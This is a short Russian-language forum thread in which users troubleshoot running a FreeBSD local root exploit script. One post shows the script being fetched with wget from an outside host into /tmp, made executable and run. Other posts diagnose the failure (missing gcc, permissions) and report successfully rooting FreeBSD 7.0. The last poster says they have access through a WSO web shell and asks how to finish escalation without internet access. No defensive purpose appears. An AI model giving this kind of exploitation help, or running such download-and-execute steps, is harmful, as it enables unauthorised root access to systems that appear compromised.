У меня он не запускается, пишет, что файл не найден... Мои действия: Code: $ cd /tmp $ wget http://myhost.ru/w00t.sh $ chmod 777 w00t.sh $ ./w00t.sh : No such file or directory
Либо нету доступа к gcc, либо к sh. Права на папку скорее всего есть. У меня зарутил 1 раз и 30 . Открой сам этот плоент, и сделай все ручками, там элементарно, но вряд ли выйдет)
Загляни в сам файл .sh, посмотри какие в итоге файоы должны были создаться и посмотри, все ли создалось, если нет, значит нет прав.
порутал FreeBSD 7.0-RELEASE-p7, спасибо! (Скрипт выполнял вручную, пошагово. Пакет не сработал, скорее всего, из-за отсутствия chmod +x env)
Если sh не работает, то лучше сделать всё руками. Сразу увидишь в каком месте не работает. Если у тебя кроме *.c больше ничего не появилось, то в системе не установлен gcc
система 7.2-RELEASE FreeBSD в локалке, есть доступ по шеллу(WSO). сплоит в /tmp/ ,чмод 777 после sh w00d.sh появляются 3 файла: env , env.c , program.c . Выше мне сказали, что не установлен gcc. Как установить gcc?(Выхода в инет нету, только локалка) Что должно произойти после удачного исполнение сплоита? Пожалуйста помогите.